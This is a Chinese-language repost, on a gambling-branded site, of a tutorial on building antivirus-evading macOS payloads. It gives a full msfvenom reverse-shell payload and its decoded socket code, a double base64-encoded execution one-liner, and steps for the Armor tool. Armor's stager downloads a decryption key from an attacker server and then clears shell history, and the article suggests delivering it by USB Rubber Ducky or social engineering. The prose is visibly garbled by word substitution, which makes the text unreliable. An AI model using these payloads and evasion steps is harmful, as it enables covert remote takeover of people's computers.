怎样建立无法检测的有效载荷 | 申博官网
登录
  • 欢迎进入申博官网!
  • 如果您觉得申博官网对你有帮助,那么赶紧使用Ctrl+D 收藏申博官网并分享出去吧
  • 这里是申博官方网!
  • 申博官网是菲律宾sunbet官网品牌平台!
  • 申博开户专业品牌平台!

怎样建立无法检测的有效载荷

申博_安全防护 申博 235次浏览 已收录 0个评论

在macOS中举行对有用载荷加密并对传输器(stager)举行编码,就可以或许竖立没法检测的有用载荷。别的,运用一些简朴的技能,就可以或许很轻易的躲过VirusTotal和macOS杀毒软件。

本文的目标是找到一个已知且易于被检测到的macOS有用载荷,然后再经由历程一种要领,许可我们在目标MacBook上实行相反的有用载荷。经由历程这个测试,我们可以或许确认所竖立的有用载荷在运转时是不是可以或许胜利绕过杀毒软件的检测。在本文的测试中,除在VirusTotal测试我们所竖立的歹意文件外,我们还在macOS Mojave(v10.14)中针对盛行的杀毒软件(如Avast,AVG,BitDefender,Sophos和ClamXAV)举行了测试。

须要注重的是:这篇文章的目标不是教人人怎样绕过GateKeeper或体系完整性珍爱(SIP),因为实行未署名的应用顺序和绕过病毒扫描顺序是两个分歧的手艺偏向。本文的重点是教人人怎样制止被杀毒软件和VirusTotal检测到。在接下来的剖析中,你会发明,本文在大多数情况下,只需经由历程简朴的编码有用载荷就足以绕过杀毒软件的检测。在此,你可以或许浏览《怎样在没有暗码的情况下举行目标的Windows体系装备》。

对有用载荷的单次Base64编码

信不信由你,找到VirusTotal和杀毒软件可以或许检测到的歹意文件是一个应战。在网上搜刮了一些关于怎样进击macOS的盛行文章以后,我才找到了一个简朴的msfvenom有用载荷。实行个中的敕令发生的输入以下:

msfvenom -p python/meterpreter/reverse_tcp LHOST=10.42.0.1 LPORT=4444

[-] No platform was selected, choosing Msf::Module::Platform::Python from the payload
[-] No arch selected, selecting arch: python from the payload
Payload size: 446 bytes
import base64,sys;exec(base64.b64decode({2:str,3:lambda b:bytes(b,'UTF-8')}[sys.version_info[0]]('aW1wb3J0IHNvY2tldCxzdHJ1Y3QsdGltZQpmb3IgeCBpbiByYW5nZSgxMCk6Cgl0cnk6CgkJcz1zb2NrZXQuc29ja2V0KDIsc29ja2V0LlNPQ0tfU1RSRUFNKQoJCXMuY29ubmVjdCgoJzEwLjQyLjAuMScsNDQ0NCkpCgkJYnJlYWsKCWV4Y2VwdDoKCQl0aW1lLnNsZWVwKDUpCmw9c3RydWN0LnVucGFjaygnPkknLHMucmVjdig0KSlbMF0KZD1zLnJlY3YobCkKd2hpbGUgbGVuKGQpPGw6CglkKz1zLnJlY3YobC1sZW4oZCkpCmV4ZWMoZCx7J3MnOnN9KQo=')))

这是一个经由base64编码的Python单行顺序,其目标就是完成与Metasploit交互。将该行顺序保存到名为“thisfileisevil.py”的文件,并将其上传到VirusTotal举行绕过检测,发明被检测到的几率仅为4/58。

怎样建立无法检测的有效载荷 怎样建立无法检测的有效载荷

这就意味着,一样平常情况下,是没有杀毒软件能检测到该文件。而对嵌入的base64字符串举行解码,你可以或许清晰的看到,Python剧本旨在用于衔接端口4444上的近程服务器(10.42.0.1)。

base64 -d <<< 'aW1wb3J0IHNvY2tldCxzdHJ1Y3QsdGltZQpmb3IgeCBpbiByYW5nZSgxMCk6Cgl0cnk6CgkJcz1zb2NrZXQuc29ja2V0KDIsc29ja2V0LlNPQ0tfU1RSRUFNKQoJCXMuY29ubmVjdCgoJzEwLjQyLjAuMScsNDQ0NCkpCgkJYnJlYWsKCWV4Y2VwdDoKCQl0aW1lLnNsZWVwKDUpCmw9c3RydWN0LnVucGFjaygnPkknLHMucmVjdig0KSlbMF0KZD1zLnJlY3YobCkKd2hpbGUgbGVuKGQpPGw6CglkKz1zLnJlY3YobC1sZW4oZCkpCmV4ZWMoZCx7J3MnOnN9KQo='

import socket,struct,time
for x in range(10):
	try:
		s=socket.socket(2,socket.SOCK_STREAM)
		s.connect(('10.42.0.1',4444))
		break
	except:
		time.sleep(5)
l=struct.unpack('>I',s.recv(4))[0]
d=s.recv(l)
while len(d)<l:
	d+=s.recv(l-len(d))
exec(d,{'s':s})

将上面解码的Python代码保存到名为“thisfileisevil_without_encoding.py”的文件中并将其上传到VirusTotal,发明被检测到的几率仅为1/56。

怎样建立无法检测的有效载荷 怎样建立无法检测的有效载荷

风趣的是,原始Python代码被检测到的几率更低。

不外现在,我们还不是很清晰VirusTotal和杀毒软件究竟在实验检测甚么。他们既没有很好的解码base64字符串,也没有符号msfvenom天生的13行Python代码,而这些代码多年来曾经被分歧的测试者和黑客运用了无数次了。在此,我发起你浏览《怎样主动对Nmap扫描举行暴力进击》。

Base64编码的基础知识

通常情况下,经由历程编码的体式格局来绕过杀毒软件的检测,是一个很不可取的体式格局,因为这类体式格局很轻易被解码和辨认,隐藏性不是很好。然则,对Python和Bash剧本举行编码是Empire和msfvenom等项目中的罕见做法,以许可编码器实行庞杂的剧本,而没必要忧郁本义可以或许致使的有用载荷中缀或涌现没法辨认的特别字符。

如今让我们看看上面的字符串:

echo 'one' | base64
b25lCg==

echo 'one two' | base64
b25lIHR3bwo=

echo 'one two three' | base64
b25lIHR3byB0aHJlZQo=

echo 'one two three four' | base64
b25lIHR3byB0aHJlZSBmb3VyCg==

echo 'one two three four five' | base64
b25lIHR3byB0aHJlZSBmb3VyIGZpdmUK

运用上面的敕令可以或许很轻易的解码一切字符串(Kali中的-d, macOS中的-d):

base64 -d <<< 'b25lIHR3byB0aHJlZSBmb3VyIGZpdmUK'

请注重:字符串的开首老是一样的,而末端会有纤细的转变,实在大多数msfvenom有用载荷也是云云。若是仅变动IP地点和端口号,则每一个黑客和测试者运用msfvenom天生的base64编码有用载荷的开首一直相反。上面是msfvenom运用IP地点“10.42.0.1”竖立的示例。

aW1wb3J0IHNvY2tldCxzdHJ1Y3QsdGltZQpmb3IgeCBpbiByYW5nZSgxMCk6Cgl0cnk6CgkJcz1zb2NrZXQuc29ja2V0KDIsc29ja2V0LlNPQ0tfU1RSRUFNKQoJCXMuY29ubmVjdCgoJzEwLjQyLjAuMScsNDQ0NCkpCgkJYnJlYWsKCWV4Y2VwdDoKCQl0aW1lLnNsZWVwKDUpCmw9c3RydWN0LnVucGFjaygnPkknLHMucmVjdig0KSlbMF0KZD1zLnJlY3YobCkKd2hpbGUgbGVuKGQpPGw6CglkKz1zLnJlY3YobC1sZW4oZCkpCmV4ZWMoZCx7J3MnOnN9KQo=

以下的msfvenom输入运用了和以上示例相反的有用载荷,然则IP地点分歧,为“192.168.0.2”。

aW1wb3J0IHNvY2tldCxzdHJ1Y3QsdGltZQpmb3IgeCBpbiByYW5nZSgxMCk6Cgl0cnk6CgkJcz1zb2NrZXQuc29ja2V0KDIsc29ja2V0LlNPQ0tfU1RSRUFNKQoJCXMuY29ubmVjdCgoJzE5Mi4xNjguMC4yJyw0NDQ0KSkKCQlicmVhawoJZXhjZXB0OgoJCXRpbWUuc2xlZXAoNSkKbD1zdHJ1Y3QudW5wYWNrKCc+SScscy5yZWN2KDQpKVswXQpkPXMucmVjdihsKQp3aGlsZSBsZW4oZCk8bDoKCWQrPXMucmVjdihsLWxlbihkKSkKZXhlYyhkLHsncyc6c30pCg==

不管运用甚么IP和端口,在运用这个msfvenom有用载荷时,前142个字符一直相反。若是没有对歹意代码举行解码和剖析,那末杀毒软件检测时罕见的base64字符串最少看起来是公道的 ,而若是一旦解码和剖析,这些看起来公道的字符串里就隐含了很多猫腻。在此,你可以或许浏览《怎样运用Jedi Mind Tricks的头脑技能破解WPA2 Wi-Fi暗码》。

对有用载荷的两重Base64编码

若是可以或许运用一个通用的Base64体式格局编码有用载荷,以绕过大多数杀毒软件,那末对它举行两重编码岂不是更有用,被检测到的几率岂不是更低。经由现实测试,并非如许,在我们对编码后的msfvenom输入内容举行再次编码,并将其上传到VirusTotal,发明被检测到的几率仅为1/54。

怎样建立无法检测的有效载荷 怎样建立无法检测的有效载荷

我们在微软的运转情况中,发明被检测到的几率仅为1/54,这对在macOS中竖立没法检测的有用载荷是没有任何资助的。因为这是经由历程对msfvenom输入举行再次编码完成的,与之前检测到的msfvenom载荷完整相反。

cat thisfileisevil.py | base64

aW1wb3J0IGJhc2U2NCxzeXM7ZXhlYyhiYXNlNjQuYjY0ZGVjb2RlKHsyOnN0ciwzOmxhbWJkYSBi
OmJ5dGVzKGIsJ1VURi04Jyl9W3N5cy52ZXJzaW9uX2luZm9bMF1dKCdhVzF3YjNKMElITnZZMnRs
ZEN4emRISjFZM1FzZEdsdFpRcG1iM0lnZUNCcGJpQnlZVzVuWlNneE1DazZDZ2wwY25rNkNna0pj
ejF6YjJOclpYUXVjMjlqYTJWMEtESXNjMjlqYTJWMExsTlBRMHRmVTFSU1JVRk5LUW9KQ1hNdVky
OXVibVZqZENnb0p6RXdMalF5TGpBdU1TY3NORFEwTkNrcENna0pZbkpsWVdzS0NXVjRZMlZ3ZERv
S0NRbDBhVzFsTG5Oc1pXVndLRFVwQ213OWMzUnlkV04wTG5WdWNHRmpheWduUGtrbkxITXVjbVZq
ZGlnMEtTbGJNRjBLWkQxekxuSmxZM1lvYkNrS2QyaHBiR1VnYkdWdUtHUXBQR3c2Q2dsa0t6MXpM
bkpsWTNZb2JDMXNaVzRvWkNrcENtVjRaV01vWkN4N0ozTW5Pbk45S1FvPScpKSkK

可以或许运用以下敕令在目标MacBook中实行这个msfvenom载荷:

python -c "$(printf '%s' 'ENCODED-PAYLOAD-HERE' | base64 -D)"

此时,printf和base64正在运用MacBook去解码(-D)字符串并马上用Python实行敕令(-c) ,其目标就是再次解码内部有用载荷并竖立反向TCP衔接。

不外,令我们惊奇的是,VirusTotal和盛行的杀毒软件都没法检测到这类绕过体式格局,没有一个经由测试的杀毒软件可以或许以文本文件或AppleScript的情势检测到经由两重编码的有用载荷。在此,请你浏览《怎样运用Nmap剧本轻松检测CVE》。

对有用载荷举行加密

如上所述,我们曾经相识了经由单次编码和两重编码的有用载荷,将会绕过大多数杀毒软件的检测(只管运用原始代码更好)。可见,剧本编码和有用载荷还是杀毒软件的开发职员最疼头的题目。 然则,AVG或Avast的某些开发职员却宣称他们的扫描顺序曾经最先经由历程递归解码base64字符串的体式格局,来寻觅罕见的编码署名。

这个说法反而让我们想到了一种绕过macOS杀毒软件的更牢靠的要领,该要领更难以检测和防备。细致历程就是除对有用载荷举行编码外,还会对其举行加密,使杀毒软件更难以对其举行解码检测。

为何有用载荷编码后还要对其举行加密?

这是因为编码的重要瑕玷是杀毒软件可以或许一连解码base64字符串并轻松发明嵌入个中的有用载荷。不管进击者编码其有用载荷多少次,杀毒软件都可以或许将其举行逆向剖析。而经由历程加密有用载荷,杀毒软件将找到的只是一串不可读的数据。 别的,杀毒软件是没法扫描经由加密的有用载荷的,而且经由加密的有用载荷也不会被平安职员读取 ,除非他们知道相识密密钥

这让我想起了Armor,Armor是一个简朴的Bash剧本,旨在竖立可以或许绕过杀毒扫描顺序的加密macOS有用载荷。

黑客工具

申博-网络安全巴士站是一个专注于网络安全、系统安全、互联网安全、信息安全,全新视界的互联网安全新媒体.

以下我会竖立一个简朴的shell剧本,用于申明怎样主动加密macOS有用载荷并实行歹意进击。

Armor剧本怎样事情

Armor将加密它给出的任何文件的内容,该文件可以或许是一行代码,也可以或许是包罗数百行代码的庞杂Python剧本,或许是由macOS支撑的任何编程言语编写的post-exploitation (后破绽应用阶段)剧本。文件内容运用一次性密钥加密。然后,密钥暂时托管在进击者的服务器上,并由目标MacBook下载以解密有用载荷。

上面是Armor与简朴的Netcat有用载荷一同运用的示例。

怎样建立无法检测的有效载荷 怎样建立无法检测的有效载荷

至于个中的细致历程,我将在以下内容中按着步调,每一步都给你讲清晰。不外大抵历程是如许的:Netcat侦听器在端口4444上被启动,以后“payload.txt”文件被读取并显现为包罗一个简朴的Bash单行顺序,当实行该顺序时,进击者就会在Netcat侦听器和目标MacBook之间竖立TCP衔接。Armor用于加密bash one-liner,Ncat卖力托管进击者在服务器上的解密密钥。当传输器在目标MacBook中实行时(没有在GIF中显现),bash one-liner将被解密和实行,此历程是无需将任何数据写入硬盘驱动器的。在运用密钥后,Ncat会马上停止侦听器。在竖立Netcat衔接后,进击者就可以或许近程接见目标MacBook。在此,你可以或许浏览《怎样将Coinhive挖矿剧本注入Wi-Fi热门》。

要相识有关剧本正在实行的操纵,和它们是怎样在不将数据写入目标硬盘的情况下实行敕令,请转到这个GitHub页面细致相识。若是有读者对Armor感兴致,并愿望举行疾速测试,可以或许依照以下步调举行操纵。

第1步:装置Armor

可以或许在这个GitHub上找到Armor,并运用上面的敕令举行复制。

git clone https://github.com/tokyoneon/Armor

Cloning into 'Armor'...
remote: Enumerating objects: 7, done.
remote: Counting objects: 100% (7/7), done.
remote: Compressing objects: 100% (6/6), done.
remote: Total 7 (delta 0), reused 0 (delta 0), pack-reused 0
Unpacking objects: 100% (7/7), done.

将(cd)变动为新竖立的Armor或目次。

cd Armor/

然后,给予armor.sh剧本实行权限。

chmod +x armor.sh

第2步:竖立有用载荷

在以上的示例GIF中,Bash one-liner可以或许用于竖立TCP衔接,但须要我们经由历程加密一个简朴的ls敕令来简化进击历程。

运用以下敕令竖立payload.txt文件。

echo 'ls -la' >/tmp/payload.txt

第3步:运用Armor加密有用载荷

如今,运用Armor里的以下敕令加密payload.txt内容。

./armor.sh /tmp/payload.txt 1.2.3.4 443

                                    ..,co8oc.oo8888cc,..
	    o8o.                ..,o889689ooo888o"88888888oooc..
	  .8888               .o88886888".88888888o'?888888888889ooo....
	  a88P            ..c688869""..,"o888888888o.?8888888888"".ooo8888oo.
	  088P         ..atc8889"".,oo8o.86888888888o 88988889",o888888888888.
	  888t  ...coo688889"'.ooo88o88b.'86988988889 8688888'o8888896989^888o
	   888888888888"..ooo88896888888   "9o688888' "888988 8888868888'o88888
           ""G8889""'ooo88888888888889   .d8o9889""'   "8688o."88888988"o888888o .
		    o8888'"""""""""'     o8688"          88868. 888888.68988888"o8o.
		    88888o.              "8888ooo.        '8888. 88888.8898888o"888o..
	           "8888l '               "888888'          '""8o"8888.8869888oo8888o
     .;.      .;;;;;,.     ,'       ,,     .,;,'      ;;;;;,.  :."8888 "888888888^88o
     OM0      xWl::coK0.  .WM,     ;MW   ,KOlccxXd   'Mk::clkXc ..8888,. "88888888888.
    .WXM.     xW      K0  .WMK     KMW   Nk     ;M:  'M:     lM':o888.o8o.  "866o9888o
    lN.Xo     xW      OK  .WKWc   lWKW  .Wd     .Ml  'M:     ;M,:888.o8888.  "88."89".
    0k dX     xW      OK  .WodX. .NodW  .Wd     .Ml  'M:     ;M, 89  888888    "88":.
   'M; 'M,    xW      KO  .Wo.No dX dW  .Wd     .Ml  'M:     oM.     '8888o
   oN   Kx    xW.cccoKO.  .Wo cWlW: dW  .Wd     .Ml  'Mc;cclkXc       "8888..
   Xd   oN.   xW xWc'.    .Wo  KM0  dW  .Wd     .Ml  'M:,WO'.          888888o.
  ;Mc...:Mc   xW  0K.     .Wo  ,W'  dW  .Wd     .Ml  'M: cW:            "888889,
  OXlllllKK   xW  .KO     .Wo   '   dW  .Wd     .Ml  'M:  oN'       . : :.::::.: :.
 .Mo     cM,  xW   .Xd    .Wo       dW  .Wd     .Ml  'M:   dX.   created by @tokyoneon_
 oW.     .Wd  xW    'W:   .Wo       dW   XO     :M;  'M:    0O
 KO       xN  xW     :N,  .Wo       dW   .O0xodO0c   'M:    .Xk

 [+]  Generated encryption key: /root/Armor/payload.txt_5c6c.key
 [+]  Encrypted payload: /root/Armor/payload.txt_5c6c.enc
 [+]  Generated SSL certificate: /root/Armor/payload.txt_5c6c.crt
 [+]  Generated SSL key: /root/Armor/payload.txt_5c6c_ssl.key
 [+]  Saved stager: /root/Armor/payload.txt_5c6c_stager.txt

 [!] Execute in the target MacBook:

bash -c "$(bash -c "$(printf '%s' 'YjAxMjMyZTU2ZTFhNDAxMDFlY2FlNjlkPi9kZXYvbnVsbCAyPiYxOyBvcGVuc3NsIGVuYyAtZCAt
YWVzLTI1Ni1jYmMgCS1pbiA8KHByaW50ZiAnJXMnICdVMkZzZEdWa1gxL29jU0tsUkdIRmZncmd1
YjlLV3JJdFlORldvNGplMzVFZTVXbTNUVytpWnA1RlVLc1o2NXBjdGt6bkdyK0gxUUo5eUtrYk8v
MXhTUT09JyB8IGJhc2U2NCAtRCkgCS1wYXNzIGZpbGU6PChjdXJsIC1zIC0taW5zZWN1cmUgaHR0
cHM6Ly8weDBBMkEwMDAxOjQ0Myk=' | base64 -D)")";history -c

 [!] Start the Ncat listener now? y/N

 [!] Start Ncat listener:

很明显,1.2.3.4地点是进击者运用的IP地点,个中解密密钥将被托管在该地点上。这可以或许是当地IP(比方,“192.168.1.2”),也可以或许是假造公用服务器地点。Ncat服务器将运用此地点和端口号(443)来托管解密密钥,端口443可以或许是进击者的Kali Linux体系中的任何可用端口。

若是在Kali中找不到LibreSSL(macOS运用的OpenSSL版本),Armor将实验自行装置它。不幸的是,在Kali / Debian中找到的OpenSSL版本与macOS的LibreSSL不兼容。这意味着,Armor将实验自行装置。

第4步:启动Ncat侦听器

在实行stager之前, Ncat侦听器会被启动,Armor会实验主动启动它。在此,你可以或许浏览《怎样绕过Mojave提拔权限的prompt要领》。

[+]  Ncat active for stager: payload.txt_e856...
Ncat: Version 7.70 ( https://nmap.org/ncat )
Ncat: Listening on :::443
Ncat: Listening on 0.0.0.0:443

第5步:实行传输器

此时,Armor将天生一个用于目标MacBook的加密和编码敕令。这个传输器可以或许嵌入到实行USB drop进击中,用于USB Rubber Ducky(USB橡皮鸭)进击,或许其他社会工程进击。USB橡皮鸭是一个相似U盘的的小装备,它有代码注入、运转顺序和盗取体系中数据的才能。

USB橡皮鸭经由历程模仿USB HID装备进击你的体系,即HID模仿进击。这个小玩意一旦插进去你的计算机,就会主动翻开Termanel/PowerShell,实行预界说的进击操纵。如今,我们只需将传输器复制并粘贴到MacBook终端便可。

实行传输器时,MacBook终端将以long(-l)花样列出 (ls)以后目次中的一切(-a)文件。

怎样建立无法检测的有效载荷 怎样建立无法检测的有效载荷

此时,我们曾经加密了一个简朴的ls敕令,但无妨再设想一下,是不是有将相反水平的殽杂应用于旨在实行种种高等进击的庞杂Python剧本上的可以或许性。现在杀毒软件还不可以或许解码base64字符串,纵然base64字符串被解码了,也没法读取嵌入和加密的有用载荷。

怎样确保有用载荷不被检测到

要知道,Armor的设想其实不圆满,它只是一个观点考证,有兴致的读者是可以或许找到很多革新要领的。比方,作为LibreSSL(LibreSSL是OpenSSL加密软件库的一个分支,为一个平安套接层(SSL)和传输层平安(TLS)协定的开源完成。)的替代品,因为大多数Debian和Kali的发行版在默许情况下都没有装置它,因而对有用载荷举行加密时,就有点不方便。

另有就是,将解密密钥托管在进击者的服务器上是伤害的。若是平安人可以或许在传输器中发明进击者的IP地点,则可以或许罗列密钥的文件名并下载它。平安人可以或许运用此密钥,将目标装备上加密的有用载荷举行反向工程,并相识进击者在MacBook上实行了哪一种破绽应用。

我们还发明,在端口53上运用UDP来传输解密密钥,更有可以或许绕过防火墙和深度数据包检测(Deep packet inspection,缩写为 DPI)的检测,使有用载荷越发隐藏。深度数据包检测(Deep packet inspection,缩写为 DPI)是一种特别的网络手艺,一样平常网络装备只会检察以太网头部、IP头部而不会剖析TCP/UDP内里的内容这类被称为浅数据包检测;与之对应的DPI会搜检TCP/UDP内里的内容,以是称为深度数据包检测。

别的,找到一种加密不依靠于衔接到互联网的目标(下载解密密钥)的有用载荷的要领将是最有用的。在此,你可以或许浏览《怎样竖立没法检测的Windows 10有用载荷》。

总结

在针对VirusToal和最少六种盛行的杀毒软件举行测试后,没有人可以或许检测到两重编码的有用载荷。而macOS杀毒扫描顺序,险些连单次Base64编码的有用载荷都完整没法辨认。而检测Armor竖立的载荷关于本日的macOS杀毒扫描顺序来讲将更具应战性。

别的,macOS太过依靠GateKeeper来防备歹意应用顺序。如前一篇文章所示,GateKeeper珍爱不适用于插进去MacBook的USB,因而可以或许经由历程社会工程的体式格局实行歹意文件进击。为了主动应对此类进击,请检察《怎样免受macOS进击》和《怎样用自毁载荷进击Mojave》。

本文翻译自:https://null-byte.wonderhowto.com/how-to/hacking-macos-create-undetectable-payload-0189715/如若转载,请说明原文地点: http://www.4hou.com/web/14858.html

安全网站

申博-网络安全巴士站是一个专注于网络安全、系统安全、互联网安全、信息安全,全新视界的互联网安全新媒体.


申博|网络安全巴士站声明:该文看法仅代表作者自己,与本平台无关。版权所有丨如未注明 , 均为原创丨本网站采用BY-NC-SA协议进行授权
转载请注明怎样建立无法检测的有效载荷
喜欢 (0)
[]
分享 (0)
发表我的评论
取消评论
表情 贴图 加粗 删除线 居中 斜体 签到

Hi,您需要填写昵称和邮箱!

  • 昵称 (必填)
  • 邮箱 (必填)
  • 网址